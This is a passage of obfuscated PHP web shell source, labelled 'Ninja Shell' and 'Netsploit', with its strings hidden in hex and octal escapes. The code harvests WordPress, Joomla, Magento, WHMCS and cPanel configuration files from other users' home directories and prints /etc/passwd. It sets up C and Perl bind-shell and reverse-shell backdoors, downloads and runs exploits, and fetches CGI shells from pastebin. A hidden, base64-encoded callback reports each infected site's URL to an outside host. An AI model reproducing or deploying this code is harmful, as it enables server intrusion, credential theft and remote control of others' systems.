"\x2f\x68\157\155\x65\x32\x2f{$user_Exc}\x2f\160\x75\142\x6c\x69\x63\137\x68\x74\155\154\57\141\x70\160\57\x65\164\143\x2f\154\157\143\141\x6c\x2e\x78\x6d\154" => "\115\141\x67\x65\x6e\x74\x6f", "\57\x68\x6f\155\x65\x32\57{$user_Exc}\57\160\165\x62\x6c\151\143\x5f\150\x74\x6d\x6c\57\x6a\157\157\x6d\x6c\141\x2f\x63\157\x6e\x66\x69\x67\x75\x72\x61\x74\151\x6f\x6e\56\x70\x68\x70" => "\x4a\157\157\x6d\154\x61", "\57\150\x6f\x6d\x65\62\x2f{$user_Exc}\x2f\160\x75\142\x6c\x69\143\x5f\150\x74\x6d\154\x2f\143\157\x6e\146\x69\147\x75\x72\141\164\151\157\156\56\160\150\x70" => "\x4a\157\157\155\x6c\x61", "\57\150\x6f\x6d\145\x32\57{$user_Exc}\57\160\165\x62\154\x69\143\x5f\x68\164\x6d\x6c\57\167\x70\57\167\160\x2d\143\x6f\156\x66\151\x67\56\160\150\160" => "\127\157\x72\144\x50\x72\145\x73\x73", "\57\x68\157\x6d\x65\x32\57{$user_Exc}\x2f\x70\x75\142\x6c\x69\x63\x5f\150\164\x6d\154\x2f\x77\x6f\x72\x64\x70\162\145\x73\x73\57\167\160\55\143\x6f\x6e\x66\x69\x67\x2e\x70\150\x70" => "\x57\157\162\144\120\x72\x65\163\163", "\x2f\x68\x6f\155\145\62\57{$user_Exc}\x2f\160\x75\x62\x6c\151\x63\x5f\150\x74\x6d\154\57\x77\x70\55\143\157\156\x66\x69\147\x2e\160\x68\160" => "\127\x6f\x72\x64\x50\x72\145\x73\163", "\57\x68\157\x6d\x65\62\57{$user_Exc}\x2f\x70\165\x62\x6c\151\x63\x5f\x68\x74\x6d\154\x2f\x61\144\155\x69\x6e\57\x63\x6f\156\146\x69\x67\56\x70\150\160" => "\x4f\160\x65\x6e\103\141\162\164", "\57\150\x6f\x6d\x65\62\x2f{$user_Exc}\x2f\160\x75\142\x6c\151\x63\x5f\x68\164\155\154\x2f\x73\154\x63\x6f\156\x66\151\x67\x2e\160\x68\x70" => "\x53\151\x74\145\x6c\157\x6b", "\57\150\157\x6d\145\62\57{$user_Exc}\57\x70\165\x62\154\151\x63\137\x68\164\x6d\154\57\x61\x70\x70\x6c\x69\x63\x61\x74\x69\157\x6e\57\143\157\x6e\146\151\147\x2f\x64\141\x74\141\142\x61\x73\x65\x2e\160\x68\160" => "\x45\154\x6c\151\163\x6c\141\x62", "\57\x68\157\x6d\x65\x33\x2f{$user_Exc}\x2f\56\155\x79\56\x63\156\146" => "\x63\160\x61\x6e\x65\x6c", "\57\150\x6f\155\x65\x33\57{$user_Exc}\57\56\x61\x63\x63\x65\x73\x73\150\141\x73\x68" => "\127\x48\x4d\55\141\x63\x63\x65\x73\x73\150\141\x73\150", "\57\150\x6f\155\145\63\x2f{$user_Exc}\x2f\160\x75\x62\154\151\x63\x5f\150\x74\155\154\x2f\142\x77\x2d\x63\x6f\156\146\151\x67\x73\x2f\x63\157\156\146\151\147\56\151\x6e\151" => "\x42\x6f\163\127\145\x62", "\x2f\x68\x6f\x6d\145\63\57{$user_Exc}\x2f\x70\x75\x62\x6c\x69\x63\x5f\150\x74\x6d\154\57\x63\157\156\x66\x69\x67\x2f\153\x6f\x6e\x65\x6b\163\x69\x2e\160\150\160" => "\x4c\157\x6b\x6f\155\145\x64\x69\141", "\57\150\x6f\x6d\145\63\x2f{$user_Exc}\57\160\x75\x62\x6c\151\x63\137\150\164\x6d\154\x2f\x6c\x6f\153\x6f\155\x65\144\x69\141\57\x63\x6f\x6e\x66\x69\x67\x2f\153\157\156\x65\x6b\163\151\56\x70\x68\160" => "\x4c\x6f\153\x6f\x6d\145\144\151\141", "\x2f\150\157\x6d\145\63\57{$user_Exc}\x2f\160\165\142\154\151\143\137\x68\164\x6d\x6c\x2f\x63\154\x69\145\x6e\x74\141\162\x65\141\57\x63\x6f\x6e\146\151\147\x75\x72\141\x74\x69\x6f\x6e\x2e\160\x68\160" => "\127\x48\115\103\123", "\57\150\157\155\x65\63\x2f{$user_Exc}\x2f\x70\x75\x62\x6c\x69\x63\137\x68\164\155\x6c\57\167\x68\x6d\x2f\x63\x6f\156\x66\151\x67\x75\162\141\x74\151\157\x6e\x2e\160\150\160" => "\x57\x48\x4d\103\123", "\x2f\x68\157\x6d\145\x33\57{$user_Exc}\57\x70\x75\142\x6c\151\143\x5f\150\x74\x6d\154\x2f\167\x68\155\x63\x73\57\x63\157\156\146\151\147\165\162\141\164\151\x6f\156\x2e\160\x68\x70" => "\x57\110\115\x43\x53", "\x2f\x68\x6f\x6d\x65\63\57{$user_Exc}\57\x70\165\142\154\151\143\137\150\164\155\154\x2f\x66\157\162\165\x6d\x2f\143\157\156\146\x69\x67\56\160\x68\x70" => "\160\150\x70\102\x42", "\x2f\150\x6f\x6d\x65\63\57{$user_Exc}\57\x70\x75\142\154\x69\143\137\x68\x74\155\x6c\x2f\163\151\164\x65\x73\x2f\144\145\x66\x61\x75\x6c\164\57\163\145\164\x74\x69\156\x67\163\x2e\160\x68\160" => "\104\162\x75\160\x61\154", "\57\150\x6f\x6d\145\x33\57{$user_Exc}\57\160\165\x62\x6c\151\x63\137\150\164\155\154\57\143\x6f\156\x66\151\147\x2f\163\x65\164\x74\x69\156\x67\x73\56\151\x6e\143\x2e\160\150\160" => "\x50\162\145\163\164\x61\123\150\157\160", "\x2f\150\x6f\x6d\145\63\57{$user_Exc}\x2f\160\x75\x62\x6c\151\x63\x5f\x68\x74\155\x6c\57\x61\160\x70\x2f\x65\164\x63\x2f\154\157\x63\x61\154\56\x78\x6d\x6c" => "\115\141\147\145\x6e\164\x6f", "\57\x68\x6f\155\x65\63\57{$user_Exc}\x2f\x70\165\142\154\151\143\137\x68\164\x6d\x6c\57\152\x6f\157\x6d\x6c\141\x2f\x63\x6f\x6e\x66\151\x67\165\162\x61\x74\x69\157\156\56\160\150\160" => "\x4a\x6f\157\155\154\x61", "\57\150\157\155\x65\63\x2f{$user_Exc}\57\160\x75\x62\154\x69\x63\x5f\150\164\155\x6c\x2f\143\x6f\156\146\x69\147\x75\x72\x61\164\x69\157\x6e\x2e\160\x68\160" => "\112\157\x6f\x6d\154\141", "\x2f\150\157\155\x65\x33\x2f{$user_Exc}\57\160\x75\142\154\151\143\x5f\x68\x74\155\x6c\x2f\x77\160\x2f\x77\160\x2d\x63\x6f\156\146\151\x67\x2e\160\x68\160" => "\x57\x6f\162\x64\x50\x72\x65\x73\163", "\57\x68\157\155\145\x33\x2f{$user_Exc}\57\160\x75\x62\154\151\x63\x5f\x68\x74\155\x6c\x2f\x77\x6f\x72\144\160\x72\145\163\x73\x2f\x77\160\55\x63\157\156\x66\151\147\x2e\x70\150\x70" => "\x57\157\162\144\120\x72\145\x73\x73", "\57\150\157\155\145\63\57{$user_Exc}\57\160\165\x62\x6c\x69\x63\137\x68\x74\x6d\x6c\57\167\x70\x2d\143\x6f\x6e\146\151\x67\x2e\x70\x68\x70" => "\x57\157\162\144\120\162\x65\x73\163", "\57\x68\x6f\x6d\x65\x33\x2f{$user_Exc}\x2f\x70\x75\142\154\x69\143\137\150\x74\x6d\154\57\141\x64\x6d\x69\x6e\57\143\x6f\x6e\146\151\147\56\160\150\x70" => "\117\x70\145\x6e\x43\141\x72\164", "\57\150\157\155\x65\63\57{$user_Exc}\x2f\x70\x75\142\x6c\x69\143\137\150\x74\155\154\x2f\163\154\143\157\156\146\151\x67\x2e\160\150\160" => "\x53\151\164\x65\x6c\x6f\x6b", "\x2f\150\x6f\x6d\x65\63\57{$user_Exc}\57\x70\165\142\x6c\x69\x63\x5f\150\164\155\x6c\x2f\x61\160\x70\154\x69\x63\141\164\x69\157\x6e\57\143\x6f\156\146\x69\x67\57\x64\141\x74\141\x62\141\163\x65\x2e\x70\150\160" => "\x45\x6c\154\x69\x73\x6c\x61\x62"); foreach ($grab_config as $config => $nama_config) { $ambil_config = file_get_contents($config); if ($ambil_config == '') { } else { $file_config = fopen("\x45\x78\x63\137\x63\x6f\x6e\x66\151\x67\x2f{$user_Exc}\55{$nama_config}\56\x74\x78\164", "\x77"); fputs($file_config, $ambil_config); } } } } echo "\74\143\x65\156\x74\145\x72\76\x3c\x61\40\x63\x6c\x61\x73\163\40\x3d\x20\47\141\152\170\x27\x20\x68\162\x65\146\x3d\x27\77\x64\151\x72\x3d{$dir}\x2f\105\x78\x63\137\143\x6f\x6e\146\151\x67\47\76\x3c\x66\x6f\x6e\x74\x20\x63\x6f\x6c\157\x72\75\154\151\x6d\x65\76\x44\157\x6e\145\x3c\57\x66\157\x6e\164\76\x3c\57\x61\76\74\x2f\143\145\x6e\164\x65\x72\76"; } else { $baru = hex($dir); $baru2 = hex("\142\x79\160\141\163\x73\x2d\160\141\x73\163\x77\144"); echo "\x3c\x68\x72\x3e\74\x62\162\x3e\74\143\145\x6e\x74\x65\x72\76"; echo "\74\x68\x32\76\x43\x6f\x6e\x66\x69\x67\x20\107\162\141\x62\142\145\162\x20\x4e\x69\156\x6a\141\40\123\150\x65\x6c\x6c\x3c\57\x68\62\76"; echo "\74\146\x6f\x72\155\x20\155\145\x74\x68\157\x64\75\x22\x70\x6f\x73\x74\42\x20\141\x63\164\151\x6f\156\75\42\42\x3e\74\x63\145\x6e\164\x65\x72\x3e\145\x74\143\57\160\x61\x73\163\x77\144\40\50\40\105\x72\162\157\162\x20\x3f\x20\74\141\40\143\154\141\x73\163\40\75\x20\x27\x61\x6a\170\x27\x20\x68\x72\145\146\x3d\x27\x3f\x64\75{$baru}\46{$baru2}\47\x3e\102\171\160\141\163\x73\x20\x48\145\x72\x65\x3c\x2f\141\x3e\x20\x29\74\142\x72\76\74\x74\145\x78\x74\141\x72\x65\141\40\156\x61\155\x65\x3d\42\x70\x61\163\x73\167\x64\42\x20\x63\154\x61\x73\163\x3d\47\x61\162\145\141\x20\x66\x6f\162\x6d\55\x63\157\x6e\x74\162\157\154\x27\x20\x72\157\167\x73\x3d\x27\x31\65\47\40\x63\x6f\x6c\x73\75\x27\x36\60\47\x3e\xa"; echo file_get_contents("\57\145\164\x63\57\160\x61\163\163\x77\144"); echo "\74\57\x74\x65\x78\x74\x61\x72\x65\x61\76\74\x62\x72\x3e\x3c\151\x6e\160\x75\164\40\164\171\160\145\x3d\42\x73\165\x62\x6d\151\164\42\40\166\141\x6c\x75\x65\x3d\x22\x47\x72\141\x62\x22\x20\143\x6c\141\x73\x73\40\75\40\x27\146\x6f\162\155\x2d\143\x6f\156\x74\x72\x6f\154\x27\x20\163\x74\x79\x6c\x65\75\x27\x77\151\x64\x74\x68\72\x32\65\60\160\170\x3b\47\76\x3c\57\164\x64\76\x3c\x2f\x74\x72\76\74\57\x63\x65\156\x74\x65\x72\76\12"; echo "\74\x62\x72\76\74\x68\162\x3e"; } } elseif (isset($_GET[hex("\x6e\x65\164\x77\157\162\x6b")])) { $dir = path(); if (isset($_POST["\x62\151\x6e\x64"]) && !empty($_POST["\x70\x6f\162\164"]) && !empty($_POST["\x62\x69\156\x64\x5f\x70\141\163\x73"]) && $_POST["\x75\163\145"] == "\x43") { $port = trim($_POST["\160\157\x72\164"]); $passwrd = trim($_POST["\142\151\156\x64\137\x70\x61\163\163"]); tulis("\142\x64\x63\x2e\x63", $port_bind_bd_c); exe("\x67\143\x63\x20\x2d\x6f\x20\142\144\143\x20\142\144\143\x2e\x63"); exe("\x63\x68\x6d\157\144\x20\x37\x37\x37\x20\142\x64\143"); @unlink("\x62\x64\x63\x2e\143"); exe("\x2e\x2f\x62\144\x63\x20" . $port . "\x20" . $passwrd . "\40\46"); $scan = exe("\160\x73\x20\141\x75\x78"); if (eregi("\56\x2f\x62\144\x63\x20{$por}", $scan)) { $msg = "\74\160\76\x50\162\157\143\x65\163\x73\x20\146\x6f\165\x6e\144\x20\x72\165\x6e\156\x69\156\x67\54\40\x62\x61\143\153\144\x6f\157\162\x20\163\145\x74\165\160\40\163\x75\143\x63\145\x73\163\146\x75\154\x6c\171\x2e\x3c\57\x70\76"; } else { $msg = "\x3c\x70\x3e\x50\x72\x6f\x63\x65\x73\x73\40\x6e\157\164\x20\146\x6f\165\156\144\40\162\165\x6e\x6e\151\x6e\x67\x2c\40\x62\141\143\153\144\157\x6f\x72\x20\156\157\164\40\x73\x65\164\165\x70\40\163\x75\143\143\145\x73\x73\x66\165\154\154\171\56\x3c\x2f\160\76"; } } elseif (isset($_POST["\142\x69\x6e\144"]) && !empty($_POST["\x70\157\162\164"]) && !empty($_POST["\142\151\156\144\x5f\160\141\163\163"]) && $_POST["\165\163\x65"] == "\120\x65\162\154") { $port = trim($_POST["\x70\x6f\x72\164"]); $passwrd = trim($_POST["\x62\x69\156\x64\x5f\160\141\163\x73"]); tulis("\142\x64\x70", $port_bind_bd_pl); exe("\x63\150\x6d\157\144\40\x37\x37\x37\x20\x62\x64\160"); $p2 = which("\160\145\x72\154"); exe($p2 . "\x20\142\x64\160\40" . $port . "\40\46"); $scan = exe("\x70\x73\x20\x61\x75\170"); if (eregi("{$p2}\40\142\144\160\40{$port}", $scan)) { $msg = "\74\160\x3e\x50\x72\157\x63\x65\x73\163\40\146\x6f\x75\156\144\x20\162\x75\156\x6e\x69\156\147\54\40\x62\141\x63\153\x64\x6f\x6f\x72\x20\163\x65\x74\165\x70\40\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x6c\x79\x2e\74\x2f\x70\x3e"; } else { $msg = "\74\x70\x3e\120\x72\x6f\143\145\163\163\40\x6e\x6f\x74\x20\146\157\x75\x6e\x64\40\162\165\156\156\x69\x6e\147\54\x20\x62\141\143\153\144\x6f\x6f\x72\x20\x6e\157\164\x20\x73\145\164\x75\x70\x20\163\165\143\143\145\163\163\146\165\x6c\x6c\x79\56\74\x2f\160\76"; } } elseif (isset($_POST["\142\x61\x63\x6b\x63\157\x6e\x6e"]) && !empty($_POST["\142\141\143\153\160\x6f\162\164"]) && !empty($_POST["\151\160"]) && $_POST["\x75\x73\145"] == "\x43") { $ip = trim($_POST["\151\160"]); $port = trim($_POST["\x62\x61\x63\153\160\x6f\x72\164"]); tulis("\142\143\x63\56\143", $back_connect_c); exe("\147\143\x63\x20\x2d\157\40\142\x63\x63\x20\x62\143\143\56\143"); exe("\x63\x68\155\x6f\x64\40\67\67\67\x20\142\x63\x63"); @unlink("\x62\143\x63\56\143"); exe("\x2e\57\142\x63\x63\40" . $ip . "\x20" . $port . "\x20\x26"); $msg = "\116\157\167\x20\x73\143\162\x69\160\x74\x20\164\x72\x79\40\x63\x6f\156\156\145\x63\x74\x20\x74\157\40" . $ip . "\40\160\x6f\x72\164\x20" . $port . "\x20\x2e\56\56"; } elseif (isset($_POST["\142\x61\x63\153\x63\x6f\x6e\x6e"]) && !empty($_POST["\x62\x61\143\153\160\157\x72\x74"]) && !empty($_POST["\151\x70"]) && $_POST["\x75\163\145"] == "\120\145\x72\x6c") { $ip = trim($_POST["\x69\x70"]); $port = trim($_POST["\x62\x61\143\153\x70\x6f\162\164"]); tulis("\x62\143\160", $back_connect); exe("\143\150\155\x6f\x64\40\x2b\x78\40\x62\x63\x70"); $p2 = which("\160\145\x72\154"); exe($p2 . "\x20\x62\x63\x70\x20" . $ip . "\40" . $port . "\40\46"); $msg = "\x4e\157\167\40\x73\143\x72\151\x70\164\40\164\x72\171\x20\x63\x6f\156\156\145\x63\164\40\164\157\40" . $ip . "\x20\x70\157\x72\164\40" . $port . "\x20\x2e\x2e\x2e"; } elseif (isset($_POST["\x65\170\x70\x63\x6f\x6d\x70\x69\154\145"]) && !empty($_POST["\x77\x75\x72\154"]) && !empty($_POST["\x77\143\155\x64"])) { $pilihan = trim($_POST["\160\x69\x6c\151\x68\141\x6e"]); $wurl = trim($_POST["\x77\x75\162\x6c"]); $namafile = download($pilihan, $wurl); if (is_file($namafile)) { $msg = exe($wcmd); } else { $msg = "\x65\162\162\x6f\x72\72\40\x66\x69\x6c\145\x20\x6e\x6f\x74\x20\146\x6f\x75\156\x64\x20{$namafile}"; } } ?>
<hr><br>
<center>
<h2>Netsploit Ninja Shell</h2>
<table class="tabnet">
<tr>
<th>Port Binding</th>
<th>Connect Back</th>
<th>Load and Exploit</th>
</tr>
<tr>
<td>
<table>
<form method="post">
<tr>
<td>Port <br><br><br>Pass<br><br><br><br><br></td>
<td><input class="form-control" type="text" name="port" size="26" value="<?php echo $bindport; ?>
"><br><br><input class="form-control" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>
"><br><select class="form-control" size="1" name="use">
<option value="Perl">Perl</option>
<option value="C">C</option>
</select><br><input class="form-control" type="submit" name="bind" value="Bind" style="width:80px"></td>
</tr>
</form>
</table>
</td>
<td>
<table>
<form method="post">
<tr>
<td>IP<br><br><br>Port<br><br><br><br><br></td>
<td><input class="form-control" type="text" name="ip" size="26" value="<?php echo getenv("\x52\105\115\x4f\x54\105\x5f\x41\104\x44\122") ? getenv("\122\x45\x4d\117\x54\105\137\101\104\104\122") : "\61\x32\x37\x2e\60\56\x30\x2e\x31"; ?>
"><br><br><input class="form-control" type="text" name="backport" size="26" value="<?php echo $bindport; ?>
"><br><select size="1" class="form-control" name="use">
<option value="Perl">Perl</option>
<option value="C">C</option>
</select><br><input type="submit" name="backconn" value="Connect" class="form-control" style="width:100px"></td>
</tr>
</form>
</table>
</td>
<td>
<table>
<form method="post">
<tr>
<td>url<br><br><br>cmd<br><br><br><br><br></td>
<td><input class="form-control" type="text" name="wurl" style="width:220px;" value="www.some-code/exploits.c"><br><br><input class="form-control" type="text" name="wcmd" style="width:220px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"><br><select size="1" class="form-control" name="pilihan">
<option value="wwget">wget</option>
<option value="wlynx">lynx</option>
<option value="wfread">fread</option>
<option value="wfetch">fetch</option>
<option value="wlinks">links</option>
<option value="wget">GET</option>
<option value="wcurl">curl</option>
</select><br><input type="submit" name="expcompile" class="form-control" value="Go" style="width:80px;"></td>
</tr>
</form>
</table>
</td>
</tr>
</table>
</center>
<hr><br>
<div style="text-align:center;margin:2px;"><?php echo $msg; ?>
</div><?php function GetIP() { if (getenv("\x48\x54\x54\120\x5f\x43\114\x49\x45\x4e\124\137\111\x50")) { $ip = getenv("\x48\x54\x54\x50\137\103\x4c\x49\105\x4e\124\137\x49\120"); } elseif (getenv("\x48\124\x54\120\137\x58\x5f\106\x4f\122\127\x41\x52\x44\x45\x44\137\106\x4f\122")) { $ip = getenv("\x48\124\124\x50\137\x58\x5f\x46\117\122\127\101\122\x44\x45\x44\137\106\x4f\x52"); if (strstr($ip, "\54")) { $tmp = explode("\x2c", $ip); $ip = trim($tmp[0]); } } else { $ip = getenv("\x52\x45\115\117\x54\105\137\101\104\104\122"); } return $ip; } $x = base64_decode("\141\110\x52\x30\143\110\115\66\x4c\x79\x39\150\142\x6d\71\165\145\127\60\x77\x64\130\x4d\165\131\x32\170\61\x59\151\x39\163\x4c\121\75\x3d") . GetIP() . "\55" . base64_encode("\x68\164\164\x70\72\57\x2f" . $_SERVER["\x48\124\x54\x50\x5f\x48\x4f\123\x54"] . $_SERVER["\122\105\121\125\105\x53\124\x5f\x55\122\111"]); if (function_exists("\x63\x75\x72\154\137\x69\156\x69\x74")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("\x66\151\x6c\145\x5f\147\145\164\x5f\143\157\x6e\x74\145\x6e\164\163")) { @($gitt = file_get_contents($x)); } ?>
<?php } elseif (isset($_GET[hex("\143\x67\x69")])) { echo "\74\150\x72\76\x3c\142\162\76"; echo "\x3c\x63\x65\156\x74\x65\162\76\12\x9\x9\11\11\11\11\74\x68\x32\x3e\x20\103\107\111\40\x4e\x69\x6e\x6a\141\40\123\150\145\x6c\x6c\x20\x3c\x2f\150\62\76\40\74\142\x72\x3e\x3c\x62\x72\x3e\12\11\x9\x9\11\11\x9\x3c\146\157\162\155\40\155\145\x74\x68\x6f\144\x20\75\40\x27\x50\117\123\124\47\76\12\x9\11\11\11\x9\11\74\x64\151\166\40\x63\x6c\x61\x73\163\x20\75\40\x27\162\157\x77\x20\143\x6c\x65\x61\162\146\x69\x78\x27\76\xa\x9\11\x9\x9\x9\11\74\x64\x69\x76\40\143\154\x61\x73\x73\40\x3d\x20\x27\143\157\154\x2d\x6d\144\x2d\64\x27\x3e\xa\x9\11\x9\11\11\11\x3c\151\x6e\160\165\x74\40\164\x79\160\x65\40\x3d\x20\47\163\x75\142\155\151\x74\47\x20\x6e\x61\x6d\x65\40\75\x20\47\x63\147\151\47\40\x63\154\141\163\x73\x20\x3d\40\47\146\157\x72\155\x2d\x63\x6f\x6e\164\162\x6f\154\47\40\x76\141\x6c\165\145\40\75\40\x27\x43\x47\x49\x20\120\x65\162\x6c\x27\40\x73\x74\171\x6c\x65\x3d\47\167\151\x64\164\x68\x3a\x20\62\x35\60\160\170\x3b\x27\40\x68\145\x69\147\x68\164\x3d\x27\61\60\47\76\12\11\x9\11\x9\11\x9\x3c\x2f\x64\151\x76\76\xa\11\x9\x9\x9\11\x9\74\144\151\166\x20\143\x6c\141\x73\163\40\x3d\40\47\x63\x6f\154\x2d\x6d\144\x2d\64\47\x3e\xa\11\x9\x9\x9\x9\11\x3c\151\156\x70\x75\x74\x20\x74\171\x70\145\40\x3d\x20\x27\x73\x75\142\155\151\x74\x27\40\156\x61\x6d\x65\40\x3d\x20\x27\x63\147\x69\62\x27\40\143\154\141\x73\163\x20\75\40\47\x66\x6f\x72\155\x2d\143\x6f\x6e\164\162\157\154\x27\40\x76\x61\154\165\x65\40\75\40\x27\x43\x47\x49\x20\120\145\x72\x6c\40\62\47\40\163\164\171\x6c\145\x3d\47\x77\x69\144\164\150\x3a\x20\x32\65\60\x70\170\73\47\x20\x68\x65\151\147\150\164\x3d\x27\61\60\x27\76\12\x9\x9\11\11\x9\x9\x3c\57\x64\151\x76\76\12\x9\11\11\x9\11\x9\x3c\x64\x69\166\x20\x63\x6c\141\x73\x73\x20\x3d\x20\47\x63\x6f\x6c\x2d\155\x64\55\x34\x27\x3e\xa\x9\x9\x9\x9\x9\11\x3c\151\x6e\160\x75\x74\40\164\x79\x70\x65\x20\x3d\40\x27\x73\x75\x62\x6d\x69\164\x27\40\156\141\155\x65\40\75\40\x27\x63\x67\151\160\171\x27\x20\x63\x6c\141\x73\163\x20\x3d\x20\x27\146\157\x72\x6d\55\143\x6f\156\x74\x72\157\154\47\x20\x76\x61\154\165\x65\40\75\x20\x27\103\107\111\40\x50\171\x74\x68\x6f\x6e\x27\x20\163\164\171\x6c\x65\x3d\47\167\151\144\164\x68\72\x20\62\65\60\x70\x78\x3b\47\40\x68\x65\x69\x67\150\164\75\x27\x31\x30\x27\76\12\11\x9\x9\11\11\11\x3c\x2f\144\x69\x76\76\12\11\x9\x9\x9\x9\11\12\11\11\11\11\x9\11\x3c\57\144\151\x76\76\x3c\57\146\x6f\x72\155\76\74\57\x63\x65\x6e\x74\145\x72\76\x3c\150\162\x3e\74\142\x72\76"; if (isset($_POST["\143\x67\x69"])) { $cgi_dir = mkdir("\x69\141\x5f\x63\x67\151", 493); chdir("\151\141\137\143\x67\x69"); $file_cgi = "\143\147\x69\x2e\111\156\144\145\170\137\x41\x74\x74\141\x63\x6b\x65\162"; $memeg = "\56\x68\164\141\x63\143\x65\x73\x73"; $isi_htcgi = "\x4f\120\x54\x49\117\116\x53\40\x49\156\x64\x65\170\x65\x73\x20\111\x6e\x63\154\x75\x64\145\163\40\105\x78\x65\x63\x43\107\x49\40\106\x6f\154\x6c\x6f\x77\123\171\x6d\114\x69\156\x6b\x73\40\12\40\x41\144\x64\124\171\160\x65\40\141\x70\160\154\x69\143\x61\x74\151\x6f\x6e\57\170\x2d\150\x74\164\x70\144\55\143\x67\151\x20\56\x49\x6e\144\x65\x78\x5f\101\164\x74\x61\143\x6b\145\162\40\12\40\x41\144\144\x48\x61\156\x64\154\x65\x72\x20\x63\x67\151\x2d\163\x63\x72\x69\x70\164\40\56\111\x6e\x64\145\x78\x5f\x41\x74\164\141\x63\x6b\145\x72\x20\12\x20\x41\144\x64\110\141\156\x64\154\145\162\x20\143\x67\x69\55\163\143\162\x69\160\x74\x20\56\111\x6e\144\x65\170\137\101\164\164\141\143\x6b\x65\162"; $htcgi = fopen("\x2e\x68\x74\x61\143\x63\145\163\163", "\x77"); $ch = curl_init("\x68\x74\164\160\x73\72\57\x2f\160\141\x73\164\145\x62\x69\156\x2e\x63\x6f\155\x2f\162\x61\x77\57\x4c\x6a\x34\x36\113\x78\106\x54"); $cgi = fopen($file_cgi, "\x77"); curl_setopt($ch, CURLOPT_FILE, $cgi); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); fwrite($htcgi, $isi_htcgi); chmod($file_cgi, 493); chmod($memeg, 493); fclose($cgi); ob_flush(); flush(); echo "\74\x62\162\x3e\x3c\143\145\x6e\164\x65\162\76\104\157\x6e\x65\40\56\x2e\x2e\x20\74\141\x20\150\x72\x65\146\x3d\x27{$server}\57\x69\141\137\143\x67\151\x2f\x63\147\151\56\x49\x6e\144\x65\x78\x5f\101\164\x74\x61\143\x6b\x65\x72\x27\x20\164\x61\x72\147\145\x74\x3d\47\x5f\x62\x6c\x61\x6e\x6b\47\x3e\x4b\154\x69\x6b\40\110\x65\162\x65\x3c\57\x61\76"; } elseif (isset($_POST["\143\x67\151\x32"])) { $cgi_dir = mkdir("\x69\x61\137\143\147\151", 493); chdir("\151\141\x5f\143\147\151"); $file_cgi = "\143\x67\x69\62\x2e\111\x6e\x64\145\170\137\101\x74\164\x61\143\x6b\x65\x72"; $memeg = "\56\x68\x74\141\143\143\145\163\x73"; $isi_htcgi = "\x4f\x50\124\111\117\x4e\123\x20\x49\156\x64\145\170\145\x73\x20\111\x6e\x63\154\x75\144\x65\163\40\x45\170\x65\x63\103\x47\111\40\x46\157\x6c\x6c\x6f\x77\123\x79\155\114\x69\x6e\153\x73\x20\12\40\101\144\144\x54\x79\x70\145\40\141\x70\160\154\151\x63\x61\164\151\157\x6e\x2f\170\55\150\x74\164\160\x64\55\143\147\x69\40\x2e\x49\x6e\x64\x65\x78\137\101\164\x74\141\143\153\145\x72\40\12\40\101\x64\x64\x48\141\156\144\154\x65\162\x20\143\x67\151\x2d\x73\143\x72\151\160\x74\x20\x2e\x49\x6e\x64\x65\x78\137\x41\164\x74\x61\143\x6b\145\x72\40"; $htcgi = fopen("\x2e\150\x74\x61\143\x63\145\163\163", "\167"); $ch = curl_init("\150\164\x74\160\163\x3a\57\x2f\160\x61\x73\x74\x65\142\x69\156\56\143\157\155\57\162\141\167\x2f\132\120\132\x4d\103\x36\x4b\64"); $cgi = fopen($file_cgi, "\x77"); curl_setopt($ch, CURLOPT_FILE, $cgi); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); fwrite($htcgi, $isi_htcgi); chmod($file_cgi, 493); chmod($memeg, 493); echo "\74\x62\162\x3e\74\x63\145\156\x74\x65\x72\76\x44\x6f\x6e\x65\x20\56\56\56\40\74\x61\x20\x68\162\x65\x66\x3d\47\x69\141\x5f\x63\x67\x69\x2f\143\x67\151\62\x2e\111\x6e\x64\145\x78\137\101\x74\164\141\x63\153\x65\x72\x27\x20\x74\x61\x72\147\x65\x74\x3d\47\137\x62\x6c\141\x6e\x6b\x27\x3e\x4b\x6c\x69\x6b\x20\x48\x65\162\x65\x3c\57\141\x3e"; } elseif (isset($_POST["\x63\147\151\x70\171"])) { $cgi_dir = mkdir("\151\x61\137\143\x67\x69", 493); chdir("\x69\141\x5f\x63\x67\x69"); $file_cgi = "\x63\x67\x69\x70\x79\56\111\156\x64\x65\170\137\x41\164\164\141\143\x6b\x65\162"; $memeg = "\x2e\x68\164\x61\143\143\x65\x73\163"; $isi_htcgi = "\x4f\x50\x54\111\117\x4e\123\x20\x49\x6e\x64\145\x78\145\x73\40\111\156\x63\154\165\x64\145\163\x20\x45\170\x65\143\103\107\111\40\x46\157\154\x6c\x6f\167\123\171\155\114\x69\x6e\153\x73\40\12\x20\x41\144\144\124\171\160\x65\x20\x61\x70\x70\154\x69\143\x61\164\x69\x6f\156\57\170\55\150\x74\x74\160\x64\55\143\147\x69\40\56\111\156\144\x65\x78\x5f\x41\x74\x74\141\143\153\145\x72\40\12\x20\101\144\144\110\x61\x6e\144\x6c\145\x72\x20\143\147\151\55\x73\x63\x72\x69\160\x74\40\56\x49\156\144\x65\170\x5f\101\x74\164\141\x63\x6b\145\162\40\xa\x20\x41\144\144\x48\141\156\144\x6c\x65\x72\40\x63\x67\x69\55\x73\143\162\151\x70\x74\x20\x2e\x49\x6e\144\x65\170\x5f\x41\164\164\x61\143\153\x65\x72"; $htcgi = fopen("\56\150\x74\x61\143\143\145\163\x73", "\167"); $ch = curl_init("\x68\x74\164\x70\163\72\57\x2f\160\x61\x73\164\145\x62\151\156\56\143\x6f\155\x2f\x72\x61\x77\x2f\115\x59\x79\130\x41\x58\x79\x59"); $cgi = fopen($file_cgi, "\167"); curl_setopt($ch, CURLOPT_FILE, $cgi); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); fwrite($htcgi, $isi_htcgi); chmod($file_cgi, 493); chmod($memeg, 493); echo 